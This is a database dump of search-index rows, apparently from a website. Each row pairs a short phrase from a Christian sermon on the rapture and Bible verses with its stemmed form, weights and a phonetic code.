(268175, '“all the eyes', '“all the eyes', 0, 1, 1.4333, '“432', 1, '*'),
(268176, '“and to', '“and to', 0, 1, 1.2333, '“530', 1, '*'),
(268177, '“and to wait', '“and to wait', 0, 1, 1.4, '“530', 1, '*'),
(268178, '“that he', '“that he', 0, 1, 1.2667, '“300', 1, '*'),
(268179, '“that he might', '“that he might', 0, 1, 1.4667, '“3523', 1, '*'),
(268180, '“there is', '“there is', 0, 1, 1.3, '“362', 1, '*'),
(268181, '“there is hope', '“there is hope', 0, 1, 1.4667, '“3621', 1, '*'),
(268361, '1 7-8', '1 7-8', 0, 1, 1.1667, '', 1, '*'),
(268362, '1 7-8 a', '1 7-8 a', 0, 1, 1.2333, 'A000', 1, '*'),
(268363, '1 cor 15', '1 cor 15', 0, 1, 1.2667, 'C600', 1, '*'),
(268364, '1 cor 6', '1 cor 6', 0, 1, 1.2333, 'C600', 1, '*'),
(268365, '1 despisers', '1 despisers', 0, 1, 1.3667, 'D21262', 1, '*'),
(268366, '1 despisers of', '1 despisers of', 0, 1, 1.4667, 'D212621', 1, '*'),
(268367, '1 giving', '1 giving', 0, 1, 1.2667, 'G152', 1, '*'),
(268368, '1 giving heed', '1 giving heed', 0, 1, 1.4333, 'G1523', 1, '*'),
(268369, '1 hypocrisy', '1 hypocrisy', 0, 1, 1.3667, 'H1262', 1, '*'),
(268370, '1 hypocrisy having', '1 hypocrisy having', 0, 1, 1.6, 'H1262152', 1, '*'),
(268371, '1 john3', '1 john3', 0, 1, 1.2333, 'J500', 1, '*'),
(268372, '1 john3 2', '1 john3 2', 0, 1, 1.3, 'J500', 1, '*'),
(268373, '1 thess', '1 thess', 0, 1, 1.2333, 'T200', 1, '*'),
(268374, '1 thess 2', '1 thess 2', 0, 1, 1.3, 'T200', 1, '*'),
(268375, '1 thessalonians', '1 thessalonians', 0, 1, 1.5, 'T2452', 1, '*'),
(268376, '1 thessalonians 4', '1 thessalonians 4', 0, 1, 1.5667, 'T2452', 1, '*'),
(268377, '1 tim 4', '1 tim 4', 0, 1, 1.2333, 'T500', 1, '*'),
(268378, '1 tim.4', '1 tim.4', 0, 1, 1.2333, 'T500', 1, '*'),
(268379, '1 tim.4 1', '1 tim.4 1', 0, 1, 1.3, 'T500', 1, '*'),
(268380, '1-4 2tim', '1-4 2tim', 0, 1, 1.2667, 'T500', 1, '*'),
(268381, '1-4 2tim 3', '1-4 2tim 3', 0, 1, 1.3333, 'T500', 1, '*'),
(268382, '1-4 covetousness', '1-4 covetousness', 0, 1, 1.5333, 'C13252', 1, '*'),
(268383, '1-4 covetousness inordinate', '1-4 covetousness inordinate', 0, 1, 1.9, 'C1325256353', 1, '*'),
(268384, '1-5', '1-5', 0, 0, 0.3, '', 1, '*'),
(268385, '1-5 rapture', '1-5 rapture', 0, 1, 1.3667, 'R136', 1, '*'),
(268386, '1-5 rapture is', '1-5 rapture is', 0, 1, 1.4667, 'R1362', 1, '*'),
(268387, '10 says', '10 says', 0, 1, 1.2333, 'S000', 2, '*'),
(268388, '10 says they', '10 says they', 0, 1, 1.4, 'S300', 1, '*'),
(268389, '11 and', '11 and', 0, 1, 1.2, 'A530', 1, '*'),
(268390, '11 and suddenly', '11 and suddenly', 0, 1, 1.5, 'A532354', 1, '*'),
(268391, '11-14', '11-14', 0, 0, 0.5, '', 1, '*'),
(268392, '11-14 1', '11-14 1', 0, 1, 1.2333, '', 1, '*'),
(268393, '11-14 1 tim.4', '11-14 1 tim.4', 0, 1, 1.4333, 'T500', 1, '*'),
(268394, '11-21', '11-21', 0, 0, 0.5, '', 1, '*'),
(268395, '11-21 zech', '11-21 zech', 0, 1, 1.3333, 'Z000', 1, '*'),
(268396, '11-21 zech 14', '11-21 zech 14', 0, 1, 1.4333, 'Z000', 1, '*'),
(268397, '13 22 2', '13 22 2', 0, 1, 1.2333, '', 1, '*'),
(268398, '13 rev', '13 rev', 0, 1, 1.2, 'R100', 1, '*'),
(268399, '13 rev 2', '13 rev 2', 0, 1, 1.2667, 'R100', 1, '*'),
(268400, '13-17', '13-17', 0, 0, 0.5, '', 1, '*'),
(268401, '13-17 5', '13-17 5', 0, 1, 1.2333, '', 1, '*'),
(268402, '13-17 5 23', '13-17 5 23', 0, 1, 1.3333, '', 1, '*'),
(268403, '14 1-5', '14 1-5', 0, 1, 1.2, '', 1, '*'),
(268404, '14 1-5 rapture', '14 1-5 rapture', 0, 1, 1.4667, 'R136', 1, '*'),
(268405, '14 rev.9', '14 rev.9', 0, 1, 1.2667, 'R100', 1, '*'),
(268406, '14 rev.9 11-21', '14 rev.9 11-21', 0, 1, 1.4667, 'R100', 1, '*'),
(268407, '14-15 eph.4', '14-15 eph.4', 0, 1, 1.3667, 'E100', 1, '*'),
(268408, '14-15 eph.4 11-14', '14-15 eph.4 11-14', 0, 1, 1.5667, 'E100', 1, '*'),
(268409, '14-18', '14-18', 0, 0, 0.5, '', 1, '*'),
(268410, '14-18 1', '14-18 1', 0, 1, 1.2333, '', 1, '*'),
(268411, '14-18 1 john3', '14-18 1 john3', 0, 1, 1.4333, 'J500', 1, '*'),
(268412, '15 15-58', '15 15-58', 0, 1, 1.2667, '', 1, '*'),
(268413, '15 15-58 2', '15 15-58 2', 0, 1, 1.3333, '', 1, '*'),
(268414, '15 rapture', '15 rapture', 0, 1, 1.3333, 'R136', 1, '*'),
(268415, '15-16 mark', '15-16 mark', 0, 1, 1.3333, 'M620', 1, '*'),
(268416, '15-16 mark 8', '15-16 mark 8', 0, 1, 1.4, 'M620', 1, '*'),
(268417, '15-58', '15-58', 0, 0, 0.5, '', 1, '*'),
(268418, '15-58 2', '15-58 2', 0, 1, 1.2333, '', 1, '*'),
(268419, '15-58 2 thess', '15-58 2 thess', 0, 1, 1.4333, 'T200', 1, '*'),
(268420, '17 then', '17 then', 0, 1, 1.2333, 'T500', 1, '*'),
(268421, '17 then we', '17 then we', 0, 1, 1.3333, 'T500', 1, '*'),
(268422, '17-18 matthew', '17-18 matthew', 0, 1, 1.4333, 'M300', 1, '*'),
(268423, '17-18 matthew 13', '17-18 matthew 13', 0, 1, 1.5333, 'M300', 1, '*'),
(268424, '19-21 and', '19-21 and', 0, 1, 1.3, 'A530', 1, '*'),
(268425, '19-21 and such', '19-21 and such', 0, 1, 1.4667, 'A532', 1, '*'),
(268426, '1thes4', '1thes4', 0, 0, 0.4, 'T200', 1, '*'),
(268427, '1thes4 14-18', '1thes4 14-18', 0, 1, 1.4, 'T200', 1, '*'),
(268428, '1thes4 14-18 1', '1thes4 14-18 1', 0, 1, 1.4667, 'T200', 1, '*'),
(268429, '1tim4', '1tim4', 0, 0, 0.3333, 'T500', 1, '*'),
(268430, '1tim4 2', '1tim4 2', 0, 1, 1.2333, 'T500', 1, '*'),
(268431, '1tim4 2 the', '1tim4 2 the', 0, 1, 1.3667, 'T530', 1, '*'),
(268432, '2 1', '2 1', 0, 1, 1.1, '', 1, '*'),
(268433, '2 1 7-8', '2 1 7-8', 0, 1, 1.2333, '', 1, '*'),
(268434, '2 11', '2 11', 0, 1, 1.1333, '', 1, '*'),
(268435, '2 11 and', '2 11 and', 0, 1, 1.2667, 'A530', 1, '*'),
(268436, '2 14-15', '2 14-15', 0, 1, 1.2333, '', 1, '*'),
(268437, '2 14-15 eph.4', '2 14-15 eph.4', 0, 1, 1.4333, 'E100', 1, '*'),
(268438, '2 20-23', '2 20-23', 0, 1, 1.2333, '', 1, '*'),
(268439, '2 20-23 1', '2 20-23 1', 0, 1, 1.3, '', 1, '*'),
(268440, '2 4-5', '2 4-5', 0, 1, 1.1667, '', 1, '*'),
(268441, '2 4-5 rev.3', '2 4-5 rev.3', 0, 1, 1.3667, 'R100', 1, '*'),
(268442, '2 9', '2 9', 0, 1, 1.1, '', 1, '*'),
(268443, '2 9 4', '2 9 4', 0, 1, 1.1667, '', 1, '*'),
(268444, '2 9 disobedience', '2 9 disobedience', 0, 1, 1.5333, 'D21352', 1, '*'),
(268445, '2 kings', '2 kings', 0, 1, 1.2333, 'K520', 1, '*'),
(268446, '2 kings 2', '2 kings 2', 0, 1, 1.3, 'K520', 1, '*'),
(268447, '2 matt.24', '2 matt.24', 0, 1, 1.3, 'M300', 1, '*'),
(268448, '2 matt.24 3', '2 matt.24 3', 0, 1, 1.3667, 'M300', 1, '*'),
(268449, '2 the deceitfulness', '2 the deceitfulness', 0, 1, 1.6333, 'T231452', 1, '*'),
(268450, '2 thess', '2 thess', 0, 1, 1.2333, 'T200', 1, '*'),
(268451, '2 thess 2', '2 thess 2', 0, 1, 1.3, 'T200', 1, '*'),
(268452, '2 timothy 3', '2 timothy 3', 0, 1, 1.3667, 'T530', 1, '*'),
(268453, '20-23', '20-23', 0, 0, 0.5, '', 1, '*'),
(268454, '20-23 1', '20-23 1', 0, 1, 1.2333, '', 1, '*'),
(268455, '20-23 1 tim', '20-23 1 tim', 0, 1, 1.3667, 'T500', 1, '*'),
(268456, '22 2', '22 2', 0, 1, 1.1333, '', 1, '*'),
(268457, '22 2 timothy', '22 2 timothy', 0, 1, 1.4, 'T530', 1, '*'),
(268458, '23 1', '23 1', 0, 1, 1.1333, '', 1, '*'),
(268459, '23 1 cor', '23 1 cor', 0, 1, 1.2667, 'C600', 1, '*'),
(268460, '24 30-31', '24 30-31', 0, 1, 1.2667, '', 1, '*'),
(268461, '24 30-31 factors', '24 30-31 factors', 0, 1, 1.5333, 'F2362', 1, '*'),
(268462, '25 31-46', '25 31-46', 0, 1, 1.2667, '', 1, '*'),
(268463, '25 31-46 jude', '25 31-46 jude', 0, 1, 1.4333, 'J300', 1, '*'),
(268464, '27-51', '27-51', 0, 0, 0.5, '', 1, '*'),
(268465, '27-51 25', '27-51 25', 0, 1, 1.2667, '', 1, '*'),
(268466, '27-51 25 31-46', '27-51 25 31-46', 0, 1, 1.4667, '', 1, '*'),
(268467, '2tim', '2tim', 0, 0, 0.2667, 'T500', 1, '*'),
(268468, '2tim 3', '2tim 3', 0, 1, 1.2, 'T500', 1, '*'),
(268469, '2tim 3 5', '2tim 3 5', 0, 1, 1.2667, 'T500', 1, '*'),
(268470, '3 1-4', '3 1-4', 0, 1, 1.1667, '', 1, '*'),
(268471, '3 1-4 covetousness', '3 1-4 covetousness', 0, 1, 1.6, 'C13252', 1, '*'),
(268472, '3 17-18 matthew', '3 17-18 matthew', 0, 1, 1.5, 'M300', 1, '*'),
(268473, '3 27-51', '3 27-51', 0, 1, 1.2333, '', 1, '*'),
(268474, '3 27-51 25', '3 27-51 25', 0, 1, 1.3333, '', 1, '*'),
(268475, '3 5 1tim4', '3 5 1tim4', 0, 1, 1.3, 'T500', 1, '*'),
(268476, '30-31', '30-31', 0, 0, 0.5, '', 1, '*'),
(268477, '30-31 factors', '30-31 factors', 0, 1, 1.4333, 'F2362', 1, '*'),
(268478, '30-31 factors that', '30-31 factors that', 0, 1, 1.6, 'F23623', 1, '*'),
(268479, '31-46', '31-46', 0, 0, 0.5, '', 1, '*'),
(268480, '31-46 jude', '31-46 jude', 0, 1, 1.3333, 'J300', 1, '*'),
(268481, '31-46 jude 14', '31-46 jude 14', 0, 1, 1.4333, 'J300', 1, '*'),
(268482, '38 when', '38 when', 0, 1, 1.2333, 'W500', 1, '*'),
(268483, '38 when you', '38 when you', 0, 1, 1.3667, 'W500', 1, '*'),
(268484, '4 1 hypocrisy', '4 1 hypocrisy', 0, 1, 1.4333, 'H1262', 1, '*'),
(268485, '4 13-17', '4 13-17', 0, 1, 1.2333, '', 1, '*'),
(268486, '4 13-17 5', '4 13-17 5', 0, 1, 1.3, '', 1, '*'),
(268487, '4 17 then', '4 17 then', 0, 1, 1.3, 'T500', 1, '*'),
(268488, '4-5 rev.3', '4-5 rev.3', 0, 1, 1.3, 'R100', 1, '*'),
(268489, '4-5 rev.3 15-16', '4-5 rev.3 15-16', 0, 1, 1.5, 'R100', 1, '*'),
(268490, '5 19-21 and', '5 19-21 and', 0, 1, 1.3667, 'A530', 1, '*'),
(268491, '5 1tim4', '5 1tim4', 0, 1, 1.2333, 'T500', 1, '*'),
(268492, '5 1tim4 2', '5 1tim4 2', 0, 1, 1.3, 'T500', 1, '*'),
(268493, '5 23', '5 23', 0, 1, 1.1333, '', 1, '*'),
(268494, '5 23 1', '5 23 1', 0, 1, 1.2, '', 1, '*'),
(268495, '6 1', '6 1', 0, 1, 1.1, '', 1, '*'),
(268496, '6 1 despisers', '6 1 despisers', 0, 1, 1.4333, 'D21262', 1, '*'),
(268497, '6 10', '6 10', 0, 1, 1.1333, '', 1, '*'),
(268498, '6 10 says', '6 10 says', 0, 1, 1.3, 'S000', 1, '*'),
(268499, '7-8', '7-8', 0, 0, 0.3, '', 1, '*'),
(268500, '7-8 a', '7-8 a', 0, 1, 1.1667, 'A000', 1, '*'),
(268501, '7-8 a type', '7-8 a type', 0, 1, 1.3333, 'A310', 1, '*'),
(268502, '8 38', '8 38', 0, 1, 1.1333, '', 1, '*'),
(268503, '8 38 when', '8 38 when', 0, 1, 1.3, 'W500', 1, '*'),
(268504, '9 4 13-17', '9 4 13-17', 0, 1, 1.3, '', 1, '*'),
(268505, '9 disobedience', '9 disobedience', 0, 1, 1.4667, 'D21352', 1, '*'),
(268506, '9 disobedience to', '9 disobedience to', 0, 1, 1.5667, 'D213523', 1, '*'),
(268507, 'a chariot', 'a chariot', 0, 1, 1.3, 'A263', 1, '*'),
(268508, 'a chariot of', 'a chariot of', 0, 1, 1.4, 'A2631', 1, '*'),
(268509, 'a check', 'a check', 0, 1, 1.2333, 'A200', 1, '*'),
(268510, 'a check list', 'a check list', 0, 1, 1.4, 'A2423', 1, '*'),
(268511, 'a christian from', 'a christian from', 0, 1, 1.5333, 'A26235165', 1, '*'),
(268512, 'a decision today', 'a decision today', 0, 1, 1.5333, 'A3253', 1, '*'),
(268513, 'a form', 'a form', 0, 1, 1.2, 'A165', 1, '*'),
(268514, 'a form of', 'a form of', 0, 1, 1.3, 'A1651', 1, '*'),
(268515, 'a glorious meeting', 'a glorious meeting', 0, 1, 1.6, 'A24625352', 1, '*'),
(268516, 'a good example', 'a good example', 0, 1, 1.4667, 'A232514', 1, '*'),
(268517, 'a military', 'a military', 0, 1, 1.3333, 'A5436', 1, '*'),
(268518, 'a military term', 'a military term', 0, 1, 1.5, 'A5436365', 1, '*'),
(268519, 'a seducer', 'a seducer', 0, 1, 1.3, 'A2326', 1, '*'),
(268520, 'a seducer rev', 'a seducer rev', 0, 1, 1.4333, 'A23261', 1, '*'),
(268521, 'a type', 'a type', 0, 1, 1.2, 'A310', 1, '*'),
(268522, 'a type of', 'a type of', 0, 1, 1.3, 'A310', 1, '*'),
(268523, 'about it', 'about it', 0, 1, 1.2667, 'A130', 1, '*'),
(268524, 'about it is', 'about it is', 0, 1, 1.3667, 'A132', 1, '*'),
(268525, 'above factors', 'abov factors', 0, 1, 1.4333, 'A12362', 1, '*'),
(268526, 'above factors as', 'abov factors as', 0, 1, 1.5333, 'A12362', 1, '*'),
(268527, 'accordance to', 'accord to', 0, 1, 1.4333, 'A263523', 1, '*'),
(268528, 'accordance to the', 'accord to the', 0, 1, 1.5667, 'A263523', 1, '*'),
(268529, 'act of', 'act of', 0, 1, 1.2, 'A231', 1, '*'),
(268530, 'act of insulting', 'act of insulting', 0, 1, 1.5333, 'A231524352', 1, '*'),
(268531, 'agents', 'agent', 0, 0, 0.4, 'A2532', 1, '*'),
(268532, 'agents hence', 'agent hence', 0, 1, 1.4, 'A253252', 1, '*'),
(268533, 'agents hence establishing', 'agent hence establishing', 0, 1, 1.8333, 'A253252314252', 1, '*'),
(268534, 'air and', 'air and', 0, 1, 1.2333, 'A653', 1, '*'),
(268535, 'air and one', 'air and one', 0, 1, 1.3667, 'A6535', 1, '*'),
(268536, 'air and so', 'air and so', 0, 1, 1.3333, 'A6532', 1, '*'),
(268537, 'alive 1', 'aliv 1', 0, 1, 1.2333, 'A410', 1, '*'),
(268538, 'alive 1 thess', 'aliv 1 thess', 0, 1, 1.4333, 'A4132', 1, '*'),
(268539, 'alive and remain', 'aliv and remain', 0, 1, 1.5333, 'A415365', 1, '*'),
(268540, 'all the believers', 'all the believers', 0, 1, 1.5667, 'A4314162', 1, '*'),
(268541, 'also being', 'also being', 0, 1, 1.3333, 'A42152', 1, '*'),
(268542, 'also being a', 'also being a', 0, 1, 1.4, 'A42152', 1, '*'),
(268543, 'an appearance', 'an appearance', 0, 1, 1.4333, 'A51652', 1, '*'),
(268544, 'an appearance of', 'an appearance of', 0, 1, 1.5333, 'A516521', 1, '*'),
(268545, 'and also being', 'and also being', 0, 1, 1.4667, 'A5342152', 1, '*'),
(268546, 'and condemns', 'and condemns', 0, 1, 1.4, 'A5325352', 1, '*'),
(268547, 'and condemns your', 'and condemns your', 0, 1, 1.5667, 'A53253526', 1, '*'),
(268548, 'and could', 'and could', 0, 1, 1.3, 'A53243', 1, '*'),
(268549, 'and could take', 'and could take', 0, 1, 1.4667, 'A532432', 1, '*'),
(268550, 'and defilement', 'and defilement', 0, 1, 1.4667, 'A531453', 1, '*'),
(268551, 'and defilement they', 'and defilement they', 0, 1, 1.6333, 'A531453', 1, '*'),
(268552, 'and demonic', 'and demonic', 0, 1, 1.3667, 'A5352', 1, '*'),
(268553, 'and demonic doctrines', 'and demonic doctrines', 0, 1, 1.7, 'A5352323652', 1, '*'),
(268554, 'and elisha', 'and elisha', 0, 1, 1.3333, 'A5342', 1, '*'),
(268555, 'and elisha in', 'and elisha in', 0, 1, 1.4333, 'A53425', 1, '*'),
(268556, 'and hated', 'and hated', 0, 1, 1.3, 'A530', 1, '*'),
(268557, 'and hated him', 'and hated him', 0, 1, 1.4333, 'A535', 1, '*'),
(268558, 'and his agents', 'and his agents', 0, 1, 1.4667, 'A532532', 1, '*'),
(268559, 'and obey their', 'and obey their', 0, 1, 1.4667, 'A53136', 1, '*'),
(268560, 'and one notable', 'and one notable', 0, 1, 1.5, 'A535314', 1, '*'),
(268561, 'and possess', 'and possess', 0, 1, 1.3667, 'A5312', 1, '*'),
(268562, 'and possess greed', 'and possess greed', 0, 1, 1.5667, 'A531263', 1, '*'),
(268563, 'and remain shall', 'and remain shall', 0, 1, 1.5333, 'A536524', 1, '*'),
(268564, 'and sadducees', 'and sadducees', 0, 1, 1.4333, 'A53232', 1, '*'),
(268565, 'and sadducees despite', 'and sadducees despite', 0, 1, 1.7, 'A532323213', 1, '*'),
(268566, 'and seducing', 'and seducing', 0, 1, 1.4, 'A5323252', 1, '*'),
(268567, 'and seducing spirits', 'and seducing spirits', 0, 1, 1.6667, 'A53232521632', 1, '*'),
(268568, 'and so', 'and so', 0, 1, 1.2, 'A532', 1, '*'),
(268569, 'and so shall', 'and so shall', 0, 1, 1.4, 'A5324', 1, '*'),
(268570, 'and such', 'and such', 0, 1, 1.2667, 'A532', 1, '*'),
(268571, 'and such like', 'and such like', 0, 1, 1.4333, 'A53242', 1, '*'),
(268572, 'and suddenly', 'and suddenly', 0, 1, 1.4, 'A532354', 1, '*'),
(268573, 'and suddenly there', 'and suddenly there', 0, 1, 1.6, 'A53235436', 1, '*'),
(268574, 'and then we', 'and then we', 0, 1, 1.3667, 'A535', 1, '*'),
(268575, 'any moment', 'ani moment', 0, 1, 1.3333, 'A530', 1, '*'),
(268576, 'any of these', 'ani of these', 0, 1, 1.4, 'A5132', 1, '*'),
(268577, 'appearance of', 'appear of', 0, 1, 1.4333, 'A16521', 1, '*'),
(268578, 'appearance of godliness', 'appear of godliness', 0, 1, 1.7667, 'A1652123452', 1, '*'),
(268579, 'appeared', 'appear', 0, 0, 0.5333, 'A163', 1, '*'),
(268580, 'appeared a', 'appear a', 0, 1, 1.3333, 'A163', 1, '*'),
(268581, 'appeared a chariot', 'appear a chariot', 0, 1, 1.6, 'A163263', 1, '*'),
(268582, 'are alive 1', 'ar alive 1', 0, 1, 1.3667, 'A641', 1, '*'),
(268583, 'are doctrines', 'ar doctrines', 0, 1, 1.4333, 'A6323652', 1, '*'),
(268584, 'are doctrines that', 'ar doctrines that', 0, 1, 1.6, 'A63236523', 1, '*'),
(268585, 'are good cynical', 'ar good cynical', 0, 1, 1.5333, 'A6232524', 1, '*'),
(268586, 'are spiritually', 'ar spiritually', 0, 1, 1.5, 'A621634', 1, '*'),
(268587, 'are spiritually dead', 'ar spiritually dead', 0, 1, 1.6667, 'A6216343', 1, '*'),
(268588, 'are you prepared', 'ar you prepared', 0, 1, 1.5333, 'A616163', 1, '*'),
(268589, 'arise', 'aris', 0, 0, 0.3333, 'A620', 1, '*'),
(268590, 'arise first', 'aris first', 0, 1, 1.3667, 'A621623', 1, '*'),
(268591, 'arise first and', 'aris first and', 0, 1, 1.5, 'A62162353', 1, '*'),
(268592, 'as a check', 'as a check', 0, 1, 1.3333, 'A200', 1, '*'),
(268593, 'at the rapture', 'at the rapture', 0, 1, 1.4667, 'A36136', 1, '*'),
(268594, 'away hence', 'awai hence', 0, 1, 1.3333, 'A520', 1, '*'),
(268595, 'away hence the', 'awai hence the', 0, 1, 1.4667, 'A523', 1, '*'),
(268596, 'backslide', 'backslid', 0, 0, 0.6, 'B243', 1, '*'),
(268597, 'backslide and', 'backslid and', 0, 1, 1.4333, 'B24353', 1, '*'),
(268598, 'backslide and begin', 'backslid and begin', 0, 1, 1.6333, 'B24353125', 1, '*'),
(268599, 'be caught', 'be caught', 0, 1, 1.3, 'B230', 1, '*'),
(268600, 'be caught up', 'be caught up', 0, 1, 1.4, 'B231', 1, '*'),
(268601, 'be with the', 'be with the', 0, 1, 1.3667, 'B300', 1, '*'),
(268602, 'begin to tolerate', 'begin to tolerate', 0, 1, 1.5667, 'B253463', 1, '*'),
(268603, 'being a seducer', 'be a seducer', 0, 1, 1.5, 'B52326', 1, '*'),
(268604, 'being sanctimonious', 'be sanctimonious', 0, 1, 1.6333, 'B5252352', 1, '*'),
(268605, 'being sanctimonious without', 'be sanctimonious without', 0, 1, 1.9, 'B52523523', 1, '*'),
(268606, 'believers in', 'believ in', 0, 1, 1.4, 'B41625', 1, '*'),
(268607, 'believers in christ', 'believ in christ', 0, 1, 1.6333, 'B416252623', 1, '*'),
(268608, 'blasphemy', 'blasphemi', 0, 0, 0.6, 'B4215', 1, '*'),
(268609, 'blasphemy means', 'blasphemi means', 0, 1, 1.5, 'B42152', 1, '*'),
(268610, 'blasphemy means irrelevance', 'blasphemi means irrelevance', 0, 1, 1.9, 'B4215264152', 1, '*'),
(268611, 'but denying', 'but denying', 0, 1, 1.3667, 'B352', 1, '*'),
(268612, 'but denying the', 'but denying the', 0, 1, 1.5, 'B3523', 1, '*'),
(268613, 'calendar is', 'calendar is', 0, 1, 1.3667, 'C45362', 1, '*'),
(268614, 'calendar is the', 'calendar is the', 0, 1, 1.5, 'C453623', 1, '*'),
(268615, 'came to do', 'came to do', 0, 1, 1.3333, 'C530', 2, '*'),
(268616, 'can hinder', 'can hinder', 0, 1, 1.3333, 'C536', 1, '*'),
(268617, 'can hinder a', 'can hinder a', 0, 1, 1.4, 'C536', 1, '*'),
(268618, 'catching', 'catch', 0, 0, 0.5333, 'C3252', 1, '*'),
(268619, 'catching up', 'catch up', 0, 1, 1.3667, 'C32521', 1, '*'),
(268620, 'catching up of', 'catch up of', 0, 1, 1.4667, 'C32521', 1, '*'),
(268621, 'caught up', 'caught up', 0, 1, 1.3, 'C310', 1, '*'),
(268622, 'caught up together', 'caught up together', 0, 1, 1.6, 'C313236', 1, '*'),
(268623, 'chariot', 'chariot', 0, 0, 0.4667, 'C630', 1, '*'),
(268624, 'chariot of', 'chariot of', 0, 1, 1.3333, 'C631', 1, '*'),
(268625, 'chariot of fire', 'chariot of fire', 0, 1, 1.5, 'C6316', 1, '*'),
(268626, 'check list', 'check list', 0, 1, 1.3333, 'C423', 1, '*'),
(268627, 'check list is', 'check list is', 0, 1, 1.4333, 'C4232', 1, '*'),
(268628, 'children obey', 'children obey', 0, 1, 1.4333, 'C43651', 1, '*'),
(268629, 'children obey your', 'children obey your', 0, 1, 1.6, 'C436516', 1, '*'),
(268630, 'children to honour', 'children to honour', 0, 1, 1.6, 'C4365356', 1, '*'),
(268631, 'christ at', 'christ at', 0, 1, 1.3, 'C623', 1, '*'),
(268632, 'christ at the', 'christ at the', 0, 1, 1.4333, 'C623', 1, '*'),
(268633, 'christ for', 'christ for', 0, 1, 1.3333, 'C62316', 1, '*'),
(268634, 'christ for a', 'christ for a', 0, 1, 1.4, 'C62316', 1, '*'),
(268635, 'christ in the', 'christ in the', 0, 1, 1.4333, 'C62353', 2, '*'),
(268636, 'christ rapture', 'christ rapture', 0, 1, 1.4667, 'C6236136', 1, '*'),
(268637, 'christ rapture of', 'christ rapture of', 0, 1, 1.5667, 'C62361361', 1, '*'),
(268638, 'christ which is', 'christ which is', 0, 1, 1.5, 'C6232', 1, '*'),
(268639, 'christ will arise', 'christ will arise', 0, 1, 1.5667, 'C623462', 1, '*'),
(268640, 'christian from', 'christian from', 0, 1, 1.4667, 'C6235165', 1, '*'),
(268641, 'christian from going', 'christian from going', 0, 1, 1.6667, 'C6235165252', 1, '*'),
(268642, 'church this', 'church this', 0, 1, 1.3667, 'C6232', 1, '*'),
(268643, 'church this refers', 'church this refers', 0, 1, 1.6, 'C62326162', 1, '*'),
(268644, 'clouds', 'cloud', 0, 0, 0.4, 'C432', 1, '*'),
(268645, 'clouds to', 'cloud to', 0, 1, 1.3, 'C4323', 1, '*'),
(268646, 'clouds to meet', 'cloud to meet', 0, 1, 1.4667, 'C432353', 1, '*'),
(268647, 'coming of jesus', 'come of jesus', 0, 1, 1.5, 'C5212', 1, '*'),
(268648, 'condemns', 'condemn', 0, 0, 0.5333, 'C5352', 1, '*'),
(268649, 'condemns your', 'condemn your', 0, 1, 1.4333, 'C53526', 1, '*'),
(268650, 'condemns your conscience', 'condemn your conscience', 0, 1, 1.8, 'C5352625252', 1, '*'),
(268651, 'conflict', 'conflict', 0, 0, 0.5333, 'C51423', 1, '*'),
(268652, 'conflict with', 'conflict with', 0, 1, 1.4333, 'C51423', 1, '*'),
(268653, 'conflict with the', 'conflict with the', 0, 1, 1.5667, 'C51423', 1, '*'),
(268654, 'conscience using', 'conscienc using', 0, 1, 1.5333, 'C525252', 1, '*'),
(268655, 'conscience using the', 'conscienc using the', 0, 1, 1.6667, 'C5252523', 1, '*'),
(268656, 'considered sacred', 'consid sacred', 0, 1, 1.5667, 'C52363263', 1, '*'),
(268657, 'considered sacred or', 'consid sacred or', 0, 1, 1.6667, 'C523632636', 1, '*'),
(268658, 'contempt', 'contempt', 0, 0, 0.5333, 'C53513', 1, '*'),
(268659, 'contempt for', 'contempt for', 0, 1, 1.4, 'C5351316', 1, '*'),
(268660, 'contempt for the', 'contempt for the', 0, 1, 1.5333, 'C53513163', 1, '*'),
(268661, 'cor 15', 'cor 15', 0, 1, 1.2, 'C600', 1, '*'),
(268662, 'cor 15 15-58', 'cor 15 15-58', 0, 1, 1.4, 'C600', 1, '*'),
(268663, 'cor 6', 'cor 6', 0, 1, 1.1667, 'C600', 1, '*'),
(268664, 'cor 6 10', 'cor 6 10', 0, 1, 1.2667, 'C600', 1, '*'),
(268665, 'could take place', 'could take place', 0, 1, 1.5333, 'C432142', 1, '*'),
(268666, 'covetousness', 'covet', 0, 0, 0.8, 'C13252', 1, '*'),
(268667, 'covetousness inordinate', 'covet inordinate', 0, 1, 1.7667, 'C1325256353', 1, '*'),
(268668, 'covetousness inordinate desire', 'covet inordinate desire', 0, 1, 2, 'C132525635326', 1, '*'),
(268669, 'cynical', 'cynic', 0, 0, 0.4667, 'C524', 1, '*'),
(268670, 'cynical haters', 'cynic haters', 0, 1, 1.4667, 'C524362', 1, '*'),
(268671, 'cynical haters of', 'cynic haters of', 0, 1, 1.5667, 'C5243621', 1, '*'),
(268672, 'dead in', 'dead in', 0, 1, 1.2333, 'D500', 1, '*'),
(268673, 'dead in christ', 'dead in christ', 0, 1, 1.4667, 'D52623', 1, '*'),
(268674, 'dead rev.3', 'dead rev.3', 0, 1, 1.3333, 'D610', 1, '*'),
(268675, 'dead rev.3 1-4', 'dead rev.3 1-4', 0, 1, 1.4667, 'D610', 1, '*'),
(268676, 'decision today', 'decis today', 0, 1, 1.4667, 'D253', 1, '*'),
(268677, 'decision today to', 'decis today to', 0, 1, 1.5667, 'D253', 1, '*'),
(268678, 'defilement they', 'defil they', 0, 1, 1.5, 'D1453', 1, '*'),
(268679, 'defilement they are', 'defil they are', 0, 1, 1.6333, 'D14536', 1, '*'),
(268680, 'demonic doctrines', 'demon doctrines', 0, 1, 1.5667, 'D52323652', 1, '*'),
(268681, 'demonic doctrines these', 'demon doctrines these', 0, 1, 1.7667, 'D5232365232', 1, '*'),
(268682, 'denying', 'deni', 0, 0, 0.4667, 'D520', 1, '*'),
(268683, 'denying the', 'deni the', 0, 1, 1.3667, 'D523', 1, '*'),
(268684, 'denying the power', 'deni the power', 0, 1, 1.5667, 'D52316', 1, '*'),
(268685, 'desire excessively', 'desir excessively', 0, 1, 1.6, 'D26214', 1, '*'),
(268686, 'desire excessively eager', 'desir excessively eager', 0, 1, 1.8, 'D2621426', 1, '*'),
(268687, 'despised', 'despis', 0, 0, 0.5333, 'D2123', 1, '*'),
(268688, 'despised him', 'despis him', 0, 1, 1.4, 'D21235', 1, '*'),
(268689, 'despised him and', 'despis him and', 0, 1, 1.5333, 'D212353', 1, '*'),
(268690, 'despisers', 'despis', 0, 0, 0.6, 'D21262', 1, '*'),
(268691, 'despisers of', 'despis of', 0, 1, 1.4, 'D212621', 1, '*'),
(268692, 'despisers of those', 'despis of those', 0, 1, 1.6, 'D21262132', 1, '*'),
(268693, 'despite the good', 'despit the good', 0, 1, 1.5333, 'D21323', 1, '*'),
